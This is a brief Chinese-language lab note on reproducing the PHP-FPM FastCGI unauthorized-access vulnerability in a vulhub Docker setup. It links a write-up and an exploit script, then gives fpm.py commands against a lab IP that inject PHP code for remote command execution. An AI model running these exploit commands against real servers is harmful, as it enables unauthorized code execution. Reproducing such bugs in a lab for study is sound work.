PHP-FPM Fastcgi未授权访问漏洞
漏洞原理
https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html
环境搭建
cd /vulhub/php/fpm
docker-compose up -d
漏洞复现
https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75
下载上面的那玩意
然后利用
python fpm.py 192.168.3.151 /usr/local/lib/php/PEAR.php
任意命令执行
python fpm.py 192.168.3.151 /usr/local/lib/php/PEAR.php -c '<?php echo `pwd`;?>'
python fpm.py 192.168.3.151 /usr/local/lib/php/PEAR.php -c '<?php echo `ls`;?>'
结束!